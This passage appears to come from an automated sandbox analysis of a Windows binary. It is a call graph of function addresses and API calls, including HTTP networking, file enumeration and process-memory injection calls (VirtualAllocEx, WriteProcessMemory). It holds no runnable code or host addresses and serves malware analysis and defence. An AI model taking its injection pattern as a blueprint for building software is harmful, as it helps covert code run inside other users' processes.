14000caf0 11 API calls 8703->8704 8705 140003f09 8704->8705 8706 14000caf0 11 API calls 8705->8706 8707 140003f18 8706->8707 8708 14000caf0 11 API calls 8707->8708 8718 140003f27 8708->8718 8709 140004053 8710 140004091 HeapFree 8709->8710 8711 1400040a6 8709->8711 8710->8711 8712 1400040b3 HeapFree 8711->8712 8713 1400040c8 8711->8713 8712->8713 8714 1400040d5 HeapFree 8713->8714 8715 1400040ea 8713->8715 8714->8715 8716 1400040f7 HeapFree 8715->8716 8717 14000410c 8715->8717 8716->8717 8717->8160 8718->8709 8719 14000e580 10 API calls 8718->8719 8720 140003fde 8719->8720 8720->8709 8721 14000e0c0 2 API calls 8720->8721 8722 140003ffe 8721->8722 8723 140002880 _vsnwprintf 8722->8723 8723->8709 8725 14000e580 10 API calls 8724->8725 8726 14000bd8e 8725->8726 8727 14000bda0 GetModuleFileNameW 8726->8727 8728 140003663 8726->8728 8729 14000bebc RtlReAllocateHeap 8726->8729 8730 14000e0c0 2 API calls 8726->8730 8727->8726 8727->8728 8744 14000e580 8728->8744 8729->8727 8729->8728 8731 14000bded LoadLibraryA 8730->8731 8732 14000e0c0 2 API calls 8731->8732 8733 14000be0c GetProcAddress 8732->8733 8733->8728 8734 14000be2a 8733->8734 8735 14000e0c0 2 API calls 8734->8735 8736 14000be3b GetProcAddress 8735->8736 8736->8728 8737 14000be59 8736->8737 8738 14000e0c0 2 API calls 8737->8738 8739 14000be6a GetProcAddress 8738->8739 8739->8728 8740 14000be84 8739->8740 8741 14000e0c0 2 API calls 8740->8741 8742 14000be95 GetProcAddress 8741->8742 8742->8728 8743 14000beaf GetProcessHeap 8742->8743 8743->8729 8745 14000e5a8 8744->8745 8746 14000e68b 8744->8746 8747 14000e0c0 2 API calls 8745->8747 8748 14000e6a6 RtlAllocateHeap 8746->8748 8749 14000e698 RtlReAllocateHeap 8746->8749 8750 14000e5b9 LoadLibraryA 8747->8750 8751 14000366f 8748->8751 8749->8751 8752 14000e0c0 2 API calls 8750->8752 8751->8088 8751->8099 8753 14000e5d8 GetProcAddress 8752->8753 8754 14000e5f2 8753->8754 8755 14000e5f9 8753->8755 8754->8751 8756 14000e0c0 2 API calls 8755->8756 8757 14000e60a GetProcAddress 8756->8757 8757->8754 8758 14000e624 8757->8758 8759 14000e0c0 2 API calls 8758->8759 8760 14000e635 GetProcAddress 8759->8760 8760->8754 8761 14000e64f 8760->8761 8762 14000e0c0 2 API calls 8761->8762 8763 14000e660 GetProcAddress 8762->8763 8763->8754 8764 14000e67e GetProcessHeap 8763->8764 8764->8746 8768 14000178b 8765->8768 8766 1400011e4 8766->8229 8766->8241 8767 140001922 8810 14000dfe0 8767->8810 8768->8766 8768->8767 8769 14000e580 10 API calls 8768->8769 8771 1400018cf memcpy memcpy 8769->8771 8771->8767 8773 14000e580 10 API calls 8774 140001945 8773->8774 8815 14000e050 8774->8815 8777 14000e050 2 API calls 8778 14000196d 8777->8778 8779 1400019c0 8778->8779 8781 14000e050 2 API calls 8778->8781 8780 14000e050 2 API calls 8779->8780 8783 1400019d4 8780->8783 8782 140001985 8781->8782 8785 14000e050 2 API calls 8782->8785 8784 14000e050 2 API calls 8783->8784 8786 1400019e8 _time64 _localtime64 8784->8786 8785->8779 8787 14000e0c0 2 API calls 8786->8787 8788 140001a25 wcsftime 8787->8788 8790 140001a88 8788->8790 8791 14000e050 2 API calls 8790->8791 8792 140001ab2 8791->8792 8793 140001b30 8792->8793 8795 14000e050 2 API calls 8792->8795 8794 14000e050 2 API calls 8793->8794 8796 140001b44 8794->8796 8797 140001af4 8795->8797 8798 14000bd60 18 API calls 8796->8798 8801 14000e050 2 API calls 8797->8801 8800 140001b54 8798->8800 8802 14000e050 2 API calls 8800->8802 8801->8793 8803 140001b90 HeapFree HeapFree 8802->8803 8803->8766 8805 14000cc9b GetTokenInformation 8804->8805 8806 14000cccd 8804->8806 8805->8806 8806->8229 8808 140001028 SysAllocString 8807->8808 8809 140001048 8807->8809 8808->8809 8809->8271 8811 14000e0c0 2 API calls 8810->8811 8812 14000dffe 8811->8812 8813 14000e580 10 API calls 8812->8813 8814 140001936 8813->8814 8814->8773 8816 14000e0c0 2 API calls 8815->8816 8817 140001959 8816->8817 8817->8777 8819 14000e0c0 2 API calls 8818->8819 8820 14000d459 WinHttpOpen 8819->8820 8822 1400075fe memset memset 8820->8822 8822->8290 8824 14000c0f4 8823->8824 8825 14000e0c0 2 API calls 8824->8825 8826 14000c107 8825->8826 8827 14000e0c0 2 API calls 8826->8827 8828 14000c14e GetProcAddress 8827->8828 8830 14000c174 8828->8830 8831 14000c17f GetNativeSystemInfo 8828->8831 8830->8831 8832 14000c190 8831->8832 8833 14000e0c0 2 API calls 8832->8833 8834 14000c23e 8833->8834 8835 14000e0c0 2 API calls 8834->8835 8836 14000c296 8835->8836 8837 14000e580 10 API calls 8836->8837 8838 14000c2d5 8837->8838 8839 140007684 ??2@YAPEAX_K 8838->8839 8840 14000c36a 8838->8840 8841 14000c2ee 8838->8841 8839->8296 8839->8298 8842 14000e0c0 2 API calls 8840->8842 8843 14000e0c0 2 API calls 8841->8843 8844 14000c376 8842->8844 8845 14000c2fa 8843->8845 8847 140002880 _vsnwprintf 8844->8847 8881 140002880 8845->8881 8847->8839 8849 14000e0c0 2 API calls 8848->8849 8851 140014e34 8849->8851 8850 140014e66 GetFileAttributesW 8852 140014e96 CreateDirectoryW 8850->8852 8853 140014e80 8850->8853 8851->8850 8851->8851 8854 140014eaa 8852->8854 8853->8852 8853->8854 8854->8298 8856 14000d420 3 API calls 8855->8856 8857 14000dc83 GetTickCount 8856->8857 8858 14000deb9 8857->8858 8875 14000dcaf 8857->8875 8859 14000e0c0 2 API calls 8858->8859 8866 14000deeb 8858->8866 8860 14000dee0 8859->8860 8861 14000e580 10 API calls 8860->8861 8861->8866 8862 14000df61 8864 14000df74 8862->8864 8865 14000df6b WinHttpCloseHandle 8862->8865 8863 14000df5b WinHttpCloseHandle 8863->8862 8869 14000df84 8864->8869 8870 14000df7e WinHttpCloseHandle 8864->8870 8865->8864 8866->8862 8866->8863 8866->8866 8867 14000dd24 WinHttpCloseHandle 8868 14000dd2d WinHttpConnect 8867->8868 8868->8875 8871 14000df8e HeapFree 8869->8871 8872 140007704 8869->8872 8870->8869 8871->8872 8872->8302 8872->8307 8873 14000caf0 11 API calls 8873->8875 8874 14000e0c0 memset memcpy 8874->8875 8875->8858 8875->8867 8875->8868 8875->8873 8875->8874 8879 14000de11 8875->8879 8885 14000d630 8875->8885 8879->8875 8880 14000de8b HeapFree 8879->8880 8900 14000d9e0 8879->8900 8918 14000bf10 8879->8918 8880->8879 8882 14000289c 8881->8882 8883 1400028ae _vsnwprintf 8882->8883 8884 1400028c9 8882->8884 8883->8884 8884->8839 8886 14000d7b8 8885->8886 8887 14000d65f 8885->8887 8888 14000d7c1 WinHttpCloseHandle 8886->8888 8899 14000d7a8 8886->8899 8889 14000d672 WinHttpSetTimeouts 8887->8889 8890 14000d668 WinHttpCloseHandle 8887->8890 8888->8899 8891 14000e0c0 2 API calls 8889->8891 8890->8889 8893 14000d6a6 WinHttpOpenRequest 8891->8893 8893->8886 8894 14000d716 8893->8894 8895 14000d745 WinHttpSendRequest 8894->8895 8896 14000d71b WinHttpSetOption 8894->8896 8895->8886 8897 14000d768 WinHttpReceiveResponse 8895->8897 8896->8886 8896->8895 8897->8886 8898 14000d778 WinHttpQueryHeaders 8897->8898 8898->8886 8898->8899 8899->8875 8901 14000da10 WinHttpQueryDataAvailable 8900->8901 8902 14000dbf6 8901->8902 8903 14000da31 8901->8903 8902->8879 8903->8901 8903->8902 8904 14000db93 RtlReAllocateHeap 8903->8904 8905 14000e580 10 API calls 8903->8905 8906 14000e0c0 2 API calls 8903->8906 8907 14000dbd3 WinHttpReadData 8903->8907 8911 14000e0c0 2 API calls 8903->8911 8913 14000e0c0 2 API calls 8903->8913 8915 14000e0c0 2 API calls 8903->8915 8904->8907 8905->8903 8908 14000da6f LoadLibraryA 8906->8908 8907->8902 8907->8903 8909 14000e0c0 2 API calls 8908->8909 8910 14000da8e GetProcAddress 8909->8910 8910->8903 8912 14000dad1 GetProcAddress 8911->8912 8912->8903 8914 14000db14 GetProcAddress 8913->8914 8914->8903 8916 14000db57 GetProcAddress 8915->8916 8916->8903 8917 14000db86 GetProcessHeap 8916->8917 8917->8904 8919 14000bf54 8918->8919 8920 14000e580 10 API calls 8919->8920 8922 14000bfa6 8919->8922 8921 14000bf67 8920->8921 8921->8922 8923 14000bf96 HeapFree 8921->8923 8922->8879 8923->8922 8929 140002575 8924->8929 8933 140002608 8924->8933 8925 140002623 8927 140002628 HeapFree 8925->8927 8928 14000263d 8925->8928 8926 140002613 CloseHandle 8926->8925 8927->8928 8928->8336 8928->8337 8930 14000e580 10 API calls 8929->8930 8931 1400025b5 8930->8931 8932 140002660 23 API calls 8931->8932 8931->8933 8932->8933 8933->8925 8933->8926 8935 14000e0c0 2 API calls 8934->8935 8936 1400051e2 CreateFileW 8935->8936 8938 14000526e 8936->8938 8949 1400052b2 8936->8949 8938->8949 8951 14000e580 10 API calls 8938->8951 8939 14000534a 8941 14000bd60 18 API calls 8939->8941 8940 1400053dc 8943 140005429 8940->8943 8944 1400053e6 SysAllocString 8940->8944 8948 140005406 8940->8948 8954 140005357 8941->8954 8942 140005414 HeapFree 8942->8943 8945 1400050be 8943->8945 8946 14000542e HeapFree 8943->8946 8947 1400053f7 8944->8947 8944->8948 8945->8348 8945->8359 8946->8945 8947->8948 8950 140005400 SysFreeString 8947->8950 8948->8942 8948->8943 8949->8939 8949->8940 8950->8948 8952 1400052c2 8951->8952 8952->8949 8955 1400052fe HeapFree 8952->8955 8953 140005396 8953->8948 8954->8948 8954->8953 8983 14000ce20 CreateFileW 8954->8983 8955->8949 8959 14000cdca WriteFile 8958->8959 8960 14000ce00 8958->8960 8959->8960 8960->8348 8962 140005d1f SysFreeString 8961->8962 8967 140005d25 8961->8967 8962->8967 8963 140005de2 8989 140001fa0 8963->8989 8965 140005d91 8969 140005d9a HeapFree 8965->8969 8970 140005dac 8965->8970 8966 140005d7f HeapFree 8966->8965 8967->8963 8968 140005d4f HeapFree 8967->8968 8972 140005d6c 8967->8972 8968->8967 8969->8970 8973 140005db5 HeapFree 8970->8973 8974 140005dc7 8970->8974 8972->8965 8972->8966 8973->8974 8974->8963 8975 140005dd0 HeapFree 8974->8975 8975->8963 8977 140002660 23 API calls 8976->8977 8978 1400023e1 8977->8978 8979 140002440 14 API calls 8978->8979 8982 1400023f7 8978->8982 8979->8982 8980 140002401 HeapFree 8981 140002418 8980->8981 8981->8358 8982->8980 8982->8981 8984 1400053cb 8983->8984 8985 14000ce7b 8983->8985 8984->8940 8984->8948 8985->8984 8986 14000e580 10 API calls 8985->8986 8987 14000cecb 8986->8987 8987->8984 8988 14000cef9 HeapFree 8987->8988 8988->8984 8990 140001fbf 8989->8990 8994 14000200d 8989->8994 8993 140001fe4 SysFreeString 8990->8993 8990->8994 8995 140001ff3 SysFreeString 8990->8995 8996 140001ff9 ??3@YAXPEAX 8990->8996 8991 140002024 HeapFree 8992 140002036 ??3@YAXPEAX 8991->8992 8992->8340 8993->8990 8994->8991 8994->8992 8995->8996 8996->8990 9003 14000d137 8997->9003 8998 14000d166 8999 14000d194 8998->8999 9001 14000d17d HeapFree 8998->9001 9008 14000d1ae 8998->9008 9000 14000d199 HeapFree 8999->9000 8999->9008 9000->9008 9001->8998 9002 14000d276 FindFirstFileW 9002->8998 9007 14000d29a 9002->9007 9003->8998 9003->9002 9004 14000d3c9 FindNextFileW 9006 14000d3e9 GetLastError 9004->9006 9004->9007 9005 14000e580 10 API calls 9005->9007 9006->8998 9007->8998 9007->9004 9007->9005 9009 14000e0c0 2 API calls 9007->9009 9010 140002880 _vsnwprintf 9007->9010 9011 14000d387 HeapFree 9007->9011 9012 14000d3b1 HeapFree 9007->9012 9008->8384 9009->9007 9010->9007 9011->9007 9012->9004 9014 140002300 CoCreateInstance 9013->9014 9015 14000ee8e 9014->9015 9015->8384 9017 140002500 26 API calls 9016->9017 9018 14000f148 9017->9018 9019 14000f1b9 9018->9019 9063 14000fca0 9018->9063 9019->8384 9022 14000f161 SysFreeString 9023 14000f167 SysAllocStringLen 9022->9023 9023->8384 9071 14000bfe0 9025->9071 9028 1400166d5 9032 14000e0c0 2 API calls 9028->9032 9029 14001672b 9077 140011210 9029->9077 9030 1400167a2 HeapFree 9031 1400167bc 9030->9031 9031->8384 9035 1400166e9 9032->9035 9035->9030 9035->9031 9040 140016410 9039->9040 9041 14000e580 10 API calls 9040->9041 9042 140016423 9041->9042 9042->8384 9044 14000ef84 9043->9044 9045 14000ef89 9043->9045 9046 140013650 13 API calls 9044->9046 9047 14000ef92 SysFreeString 9045->9047 9048 14000ef98 9045->9048 9046->9045 9047->9048 9049 14000efa4 HeapFree 9048->9049 9050 14000efb6 9048->9050 9049->9050 9051 14000efd1 9050->9051 9052 14000efbf HeapFree 9050->9052 9053 14000efe0 9051->9053 9404 140011110 9051->9404 9052->9051 9055 14000efef 9053->9055 9410 140011190 9053->9410 9059 14000f00d HeapFree 9055->9059 9062 14000f02a 9055->9062 9057 14000f03d HeapFree 9058 14000f04f 9057->9058 9060 14000f05b HeapFree 9058->9060 9061 14000f06d ??3@YAXPEAX 9058->9061 9059->9055 9060->9061 9061->8384 9062->9057 9062->9058 9066 14000fe40 9063->9066 9069 14000fe80 9066->9069 9067 14000e0c0 2 API calls 9067->9069 9068 14000f154 9068->9019 9068->9022 9068->9023 9069->9067 9069->9068 9070 140002440 14 API calls 9069->9070 9070->9069 9072 14000c02c 9071->9072 9073 14000e580 10 API calls 9072->9073 9075 14000c086 9072->9075 9074 14000c03c 9073->9074 9074->9075 9076 14000c076 HeapFree 9074->9076 9075->9028 9075->9029 9075->9035 9076->9075 9078 140011245 9077->9078 9079 14001128f 9077->9079 9080 14000e0c0 2 API calls 9078->9080 9081 140011294 9079->9081 9082 14001130d 9079->9082 9083 140011256 9080->9083 9085 14000cc50 3 API calls 9081->9085 9097 1400112ba 9081->9097 9087 14001131e 9082->9087 9088 1400112f1 9082->9088 9090 140011374 TerminateProcess 9083->9090 9091 14001139b 9083->9091 9092 14001129e 9085->9092 9093 14000e050 2 API calls 9087->9093 9101 140011306 9088->9101 9178 140012820 9088->9178 9089 1400112da 9096 14000e050 2 API calls 9089->9096 9090->9091 9091->9035 9102 140015930 memset 9091->9102 9092->9097 9152 140014740 9092->9152 9093->9083 9096->9083 9097->9088 9170 140012510 9097->9170 9099 14000e050 2 API calls 9099->9083 9101->9091 9101->9099 9103 14001599c 9102->9103 9129 1400159ee 9102->9129 9104 14000caf0 11 API calls 9103->9104 9105 1400159a9 9104->9105 9110 14000caf0 11 API calls 9105->9110 9106 140015b11 9111 140015b67 HeapFree 9106->9111 9112 140015b7c 9106->9112 9107 14000caf0 11 API calls 9109 140015abb 9107->9109 9108 14000bd60 18 API calls 9108->9106 9114 14000bfe0 11 API calls 9109->9114 9126 140015ad2 9109->9126 9113 1400159bb 9110->9113 9111->9112 9115 140015b81 HeapFree 9112->9115 9116 140015b96 9112->9116 9117 14000bfe0 11 API calls 9113->9117 9114->9126 9115->9116 9118 140015bb5 9116->9118 9119 140015ba0 HeapFree 9116->9119 9120 1400159d4 9117->9120 9121 140015bd4 9118->9121 9122 140015bbf HeapFree 9118->9122 9119->9118 9120->9106 9123 14000bfe0 11 API calls 9120->9123 9124 140015bd9 HeapFree 9121->9124 9125 140015bee 9121->9125 9122->9121 9123->9129 9124->9125 9127 140015bf3 HeapFree 9125->9127 9128 140015c08 9125->9128 9126->9106 9126->9108 9127->9128 9128->9035 9130 140011c80 9128->9130 9129->9106 9129->9107 9129->9126 9131 140011cbe 9130->9131 9132 140011cf0 9131->9132 9138 140013b50 2 API calls 9131->9138 9142 140011ed7 9131->9142 9133 140011d13 9132->9133 9135 140013b50 2 API calls 9132->9135 9132->9142 9134 140011d41 9133->9134 9136 140013b50 2 API calls 9133->9136 9133->9142 9137 140011e03 9134->9137 9139 140013b50 2 API calls 9134->9139 9134->9142 9135->9133 9136->9134 9140 140013800 13 API calls 9137->9140 9138->9132 9148 140011d73 9139->9148 9141 140011e5e 9140->9141 9141->9142 9143 140011e8b 9141->9143 9292 140013b00 ReadProcessMemory 9141->9292 9142->9035 9294 140014000 9143->9294 9148->9137 9148->9142 9149 140013b50 2 API calls 9148->9149 9150 140011de2 9149->9150 9150->9137 9151 140011dee HeapFree 9150->9151 9151->9137 9153 140014790 9152->9153 9154 14000e0c0 2 API calls 9153->9154 9155 1400147b2 9154->9155 9156 14000e580 10 API calls 9155->9156 9157 140014804 9155->9157 9162 1400148c4 9156->9162 9158 140014859 HeapFree 9157->9158 9159 14001486e 9157->9159 9158->9159 9160 140014873 HeapFree 9159->9160 9161 140014888 9159->9161 9160->9161 9161->9097 9162->9157 9226 140014540 9162->9226 9165 140014983 GetLastError 9165->9157 9166 140014992 9165->9166 9167 14000e580 10 API calls 9166->9167 9168 14001499f 9167->9168 9168->9157 9169 14000e0c0 2 API calls 9168->9169 9169->9157 9171 140012546 9170->9171 9172 14000e0c0 2 API calls 9171->9172 9173 14001256c 9172->9173 9174 1400112d6 9173->9174 9175 14000e580 10 API calls 9173->9175 9174->9088 9174->9089 9177 1400125f7 9175->9177 9176 1400126d3 HeapFree 9176->9174 9177->9174 9177->9176 9179 14001285b memset 9178->9179 9181 140011343 9178->9181 9183 14001288b 9179->9183 9180 140012bbf 9180->9181 9182 140012df5 VirtualFreeEx 9180->9182 9181->9101 9202 1400113e0 9181->9202 9182->9181 9183->9180 9184 14000e0c0 2 API calls 9183->9184 9185 140012a4a 9184->9185 9186 14000e0c0 2 API calls 9185->9186 9187 140012aae GetProcAddress 9186->9187 9188 14000e0c0 2 API calls 9187->9188 9189 140012ad1 GetProcAddress 9188->9189 9190 14000e0c0 2 API calls 9189->9190 9191 140012af4 GetProcAddress 9190->9191 9192 14000e0c0 2 API calls 9191->9192 9193 140012b17 GetProcAddress 9192->9193 9194 14000e0c0 2 API calls 9193->9194 9195 140012b3a GetProcAddress 9194->9195 9196 14000e0c0 2 API calls 9195->9196 9197 140012b5d GetProcAddress 9196->9197 9198 14000e0c0 2 API calls 9197->9198 9199 140012b80 GetProcAddress 9198->9199 9200 14000e0c0 2 API calls 9199->9200 9201 140012ba3 GetProcAddress 9200->9201 9201->9180 9203 14001166a 9202->9203 9208 140011412 9202->9208 9203->9101 9204 14001161e 9205 140011652 9204->9205 9241 140013650 9204->9241 9205->9203 9207 140011657 HeapFree 9205->9207 9207->9203 9208->9204 9209 14001149e 9208->9209 9210 14001148d GetLastError 9208->9210 9209->9204 9239 140013ab0 WriteProcessMemory 9209->9239 9210->9204 9210->9209 9212 14000e580 10 API calls 9213 1400115c9 memset 9212->9213 9214 140013ab0 WriteProcessMemory 9213->9214 9215 14001151f 9214->9215 9215->9204 9215->9212 9217 140013ab0 WriteProcessMemory 9215->9217 9218 1400116a3 9215->9218 9217->9215 9218->9204 9224 14001195a 9218->9224 9245 1400130c0 9218->9245 9262 1400132c0 9218->9262 9221 140011b37 9221->9204 9273 140013070 9221->9273 9222 14000e0c0 2 API calls 9223 140011a3c lstrcmp 9222->9223 9223->9224 9224->9204 9224->9221 9224->9222 9225 14000e0c0 memset memcpy 9224->9225 9225->9224 9227 14001456e 9226->9227 9230 14001463a 9226->9230 9228 14000e0c0 2 API calls 9227->9228 9229 14001457f 9228->9229 9229->9230 9231 14000e0c0 2 API calls 9229->9231 9230->9157 9230->9165 9230->9168 9232 1400145ae GetProcAddress 9231->9232 9233 14000e0c0 2 API calls 9232->9233 9234 1400145d4 GetProcAddress 9233->9234 9235 14000e0c0 2 API calls 9234->9235 9236 1400145fa GetProcAddress 9235->9236 9237 14000e0c0 2 API calls 9236->9237 9238 140014620 GetProcAddress 9237->9238 9238->9230 9240 140013ae0 9239->9240 9240->9215 9242 14001366a 9241->9242 9244 1400136a2 9241->9244 9276 140013800 9242->9276 9244->9205 9246 14000e0c0 2 API calls 9245->9246 9247 1400130f6 9246->9247 9248 14000e0c0 2 API calls 9247->9248 9249 14001314c GetProcAddress 9248->9249 9251 140013178 MultiByteToWideChar 9249->9251 9252 140013274 9249->9252 9251->9252 9253 1400131ad 9251->9253 9252->9218 9254 14000e580 10 API calls 9253->9254 9255 1400131c2 MultiByteToWideChar 9254->9255 9256 14001323a 9255->9256 9257 1400131eb 9255->9257 9256->9252 9258 14001325f HeapFree 9256->9258 9286 140013b50 9257->9286 9258->9252 9261 140013800 13 API calls 9261->9256 9263 14000e0c0 2 API calls 9262->9263 9264 1400132f9 9263->9264 9265 14000e0c0 2 API calls 9264->9265 9266 14001334c GetProcAddress 9265->9266 9268 140013378 9266->9268 9269 1400133d0 9266->9269 9270 1400133a5 9268->9270 9272 140013b50 2 API calls 9268->9272 9269->9218 9270->9269 9271 140013800 13 API calls 9270->9271 9271->9269 9272->9270 9274 140013800 13 API calls 9273->9274 9275 1400130af 9274->9275 9275->9204 9277 140013857 9276->9277 9278 140013a92 9277->9278 9279 14000e580 10 API calls 9277->9279 9278->9244 9281 14001389b 9279->9281 9280 140013a68 9280->9244 9281->9280 9281->9281 9282 140013a53 HeapFree 9281->9282 9283 140013908 WriteProcessMemory 9281->9283 9282->9280 9284 140013a32 VirtualFreeEx 9283->9284 9285 14001393d 9283->9285 9284->9282 9285->9284 9287 140013b8a 9286->9287 9288 140013b92 WriteProcessMemory 9287->9288 9289 140013214 9287->9289 9290 140013bc3 9288->9290 9291 140013bcf VirtualFreeEx 9288->9291 9289->9256 9289->9261 9290->9289 9290->9291 9291->9289 9293 140013b30 9292->9293 9293->9143 9315 14000f310 9294->9315 9296 140014017 9298 140011ecb 9296->9298 9344 140014080 9296->9344 9298->9142 9299 140013cd0 9298->9299 9300 140013fe5 9299->9300 9312 140013d03 9299->9312 9300->9142 9301 140013d32 lstrlenW 9301->9312 9302 140013d1b HeapFree 9302->9301 9303 140013f91 9304 140013fb6 HeapFree 9303->9304 9305 140013fcb 9303->9305 9304->9305 9305->9300 9306 140013fd0 HeapFree 9305->9306 9306->9300 9307 140013dec HeapFree 9307->9312 9308 140013e1a HeapFree 9308->9312 9309 14000e580 10 API calls 9309->9312 9310 140013eb7 HeapFree 9310->9312 9311 140011fe0 18 API calls 9311->9312 9312->9301 9312->9302 9312->9303 9312->9307 9312->9308 9312->9309 9312->9310 9312->9311 9313 140013800 13 API calls 9312->9313 9314 140013f5e HeapFree 9313->9314 9314->9312 9317 14000f39c 9315->9317 9316 14000e0c0 2 API calls 9318 14000f3fc 9316->9318 9317->9316 9319 14000f81b 9318->9319 9320 14000e0c0 2 API calls 9318->9320 9322 14000f82a HeapFree 9319->9322 9323 14000f83c 9319->9323 9321 14000f47b 9320->9321 9326 140002880 _vsnwprintf 9321->9326 9322->9323 9324 14000f861 HeapFree 9323->9324 9325 14000f876 9323->9325 9324->9325 9327 14000f883 HeapFree 9325->9327 9328 14000f898 9325->9328 9338 14000f4cc 9326->9338 9327->9328 9328->9296 9329 14000f4eb HeapFree 9329->9338 9330 14000f50d HeapFree 9330->9338 9331 14000e0c0 2 API calls 9331->9338 9332 140002880 _vsnwprintf 9332->9338 9333 14000f5d2 GetFileTime 9333->9338 9334 14000f637 _time64 9335 14000f65c _time64 9334->9335 9334->9338 9335->9338 9336 14000f69d HeapFree 9336->9338 9337 14000caf0 11 API calls 9337->9338 9338->9319 9338->9323 9338->9329 9338->9330 9338->9331 9338->9332 9338->9333 9338->9334 9338->9336 9338->9337 9339 14000f700 Sleep 9338->9339 9340 140002660 23 API calls 9338->9340 9341 14000cd70 2 API calls 9338->9341 9343 140014080 38 API calls 9338->9343 9339->9338 9340->9338 9342 14000f7d5 _time64 9341->9342 9342->9338 9343->9338 9345 14001409f 9344->9345 9346 14000e0c0 2 API calls 9345->9346 9348 14001416f 9346->9348 9347 1400144fe 9347->9296 9348->9347 9349 14000e0c0 2 API calls 9348->9349 9350 1400141ce 9349->9350 9351 140002880 _vsnwprintf 9350->9351 9352 14001421e 9351->9352 9352->9347 9353 14000e0c0 2 API calls 9352->9353 9354 140014236 9353->9354 9355 140002880 _vsnwprintf 9354->9355 9357 14001428a 9355->9357 9356 1400143d9 9358 14001440c HeapFree 9356->9358 9359 140014421 9356->9359 9357->9347 9357->9356 9361 14000e580 10 API calls 9357->9361 9358->9359 9359->9347 9360 1400144c3 9359->9360 9362 14000bfe0 11 API calls 9359->9362 9364 1400144cf HeapFree 9360->9364 9363 14001437a 9361->9363 9365 14001445b 9362->9365 9363->9356 9366 140014382 ReadFile 9363->9366 9364->9347 9367 1400144e9 HeapFree 9364->9367 9365->9364 9373 140011fe0 9365->9373 9366->9356 9368 1400143ad 9366->9368 9367->9347 9370 140002660 23 API calls 9368->9370 9370->9356 9374 140012399 9373->9374 9375 14001202b 9373->9375 9374->9364 9399 1400123d0 9374->9399 9376 140012054 9375->9376 9380 140013b50 2 API calls 9375->9380 9377 140012084 9376->9377 9378 140013b50 2 API calls 9376->9378 9384 1400121c2 9376->9384 9379 1400120b2 9377->9379 9381 140013b50 2 API calls 9377->9381 9377->9384 9378->9377 9382 1400120f4 VirtualAllocEx 9379->9382 9379->9384 9385 140013b50 2 API calls 9379->9385 9380->9376 9381->9379 9383 14001212b 9382->9383 9382->9384 9387 140013800 13 API calls 9383->9387 9384->9374 9389 14001237f HeapFree 9384->9389 9386 1400120e8 9385->9386 9386->9382 9386->9384 9388 140012191 9387->9388 9388->9384 9390 140013b00 ReadProcessMemory 9388->9390 9389->9374 9391 1400121be 9390->9391 9391->9384 9392 140013b00 ReadProcessMemory 9391->9392 9393 1400121e6 9392->9393 9393->9384 9394 14000e580 10 API calls 9393->9394 9395 14001225a 9394->9395 9395->9384 9396 140013b00 ReadProcessMemory 9395->9396 9397 140012289 9396->9397 9397->9384 9398 140013b00 ReadProcessMemory 9397->9398 9398->9384 9400 140012421 9399->9400 9401 1400123dd 9399->9401 9400->9360 9401->9400 9402 140013800 13 API calls 9401->9402 9403 140012407 HeapFree 9402->9403 9403->9400 9405 140011125 9404->9405 9409 140011158 9404->9409 9406 140011130 SysFreeString SysFreeString 9405->9406 9406->9406 9406->9409 9407 14001116b HeapFree 9408 14001117d 9407->9408 9408->9053 9409->9407 9409->9408 9411 1400111a5 9410->9411 9412 1400111d8 9410->9412 9415 1400111b0 SysFreeString SysFreeString 9411->9415 9413 1400111eb HeapFree 9412->9413 9414 1400111fd 9412->9414 9413->9414 9414->9055 9415->9412 9415->9415 9419 140007000 9416->9419 9417 14000711f 9417->8442 9417->8443 9418 14000710f CryptReleaseContext 9418->9417 9420 14000e580 10 API calls 9419->9420 9422 1400070d2 9419->9422 9421 1400070a2 9420->9421 9421->9422 9423 1400070d9 HeapFree 9421->9423 9422->9417 9422->9418 9423->9422 9425 1400042d2 ??3@YAXPEAX 9424->9425 9426 1400042cc 9424->9426 9425->8471 9426->9425 9428 14000b3f4 9427->9428 9429 14000b39f 9427->9429 9430 14000b3b6 HeapFree 9429->9430 9431 14000b3c8 9429->9431 9430->9431 9431->9428 9432 14000b3d8 HeapFree 9431->9432 9432->9431 9434 14000e580 10 API calls 9433->9434 9435 140007262 9434->9435 9436 1400026ab 9435->9436 9437 140006fb0 12 API calls 9435->9437 9438 1400072ec 9435->9438 9436->8531 9436->8547 9437->9435 9439 14000730e HeapFree 9438->9439 9440 1400072fe HeapFree 9438->9440 9439->9436 9440->9439 9445 1400073a0 9441->9445 9442 1400074aa 9443 140002703 9442->9443 9444 1400074e8 CryptReleaseContext 9442->9444 9443->8547 9451 140006d20 9443->9451 9444->9443 9445->9442 9446 14000e580 10 API calls 9445->9446 9447 140007464 9446->9447 9447->9442 9448 14000746c memcpy 9447->9448 9449 1400074a6 9448->9449 9449->9442 9450 1400074b1 HeapFree 9449->9450 9450->9442 9453 140006d75 9451->9453 9452 14000272a 9452->8542 9452->8543 9452->8547 9453->9452 9454 140006fb0 12 API calls 9453->9454 9455 140006dba 9454->9455 9456 140006eb9 9455->9456 9457 14000e0c0 2 API calls 9455->9457 9456->9452 9458 140006f7c HeapFree 9456->9458 9459 140006dd7 9457->9459 9458->9452 9459->9456 9460 14000e0c0 2 API calls 9459->9460 9461 140006e37 9460->9461 9461->9456 9462 14000e0c0 2 API calls 9461->9462 9462->9456 9464 14000e580 10 API calls 9463->9464 9466 140007560 9464->9466 9465 140007584 9465->8547 9466->9465 9467 14000758e HeapFree 9466->9467 9467->9465 9482 14000c8c0 9468->9482 9471 14000e580 10 API calls 9473 140005b26 9471->9473 9472 140005be4 HeapFree 9475 140005bf9 9472->9475 9478 14000e0c0 2 API calls 9473->9478 9481 140005baa 9473->9481 9474 140005c15 9474->8674 9475->9474 9476 140005c02 HeapFree 9475->9476 9476->9474 9477 140005bcd HeapFree 9477->9481 9479 140005b46 9478->9479 9480 140002880 _vsnwprintf 9479->9480 9480->9481 9481->9472 9481->9475 9481->9477 9485 14000c8f5 9482->9485 9483 140005b08 9483->9471 9483->9481 9484 14000e580 10 API calls 9484->9485 9485->9483 9485->9484 9504 1400162a0 9486->9504 9488 1400168c5 9488->8683 9489 140016806 9489->9488 9490 140016827 _time64 9489->9490 9491 1400168b0 HeapFree 9489->9491 9490->9491 9492 14001683c 9490->9492 9491->9488 9517 140015c30 9492->9517 9494 14001684c 9495 140016898 9494->9495 9496 14000ef60 25 API calls 9494->9496 9495->9491 9497 14001685c ??3@YAXPEAX 9496->9497 9531 140015cf0 9497->9531 9500 140016878 _time64 9500->9495 9501 14001689a 9502 14000ef60 25 API calls 9501->9502 9503 1400168a2 ??3@YAXPEAX 9502->9503 9503->9495 9505 14000e0c0 2 API calls 9504->9505 9506 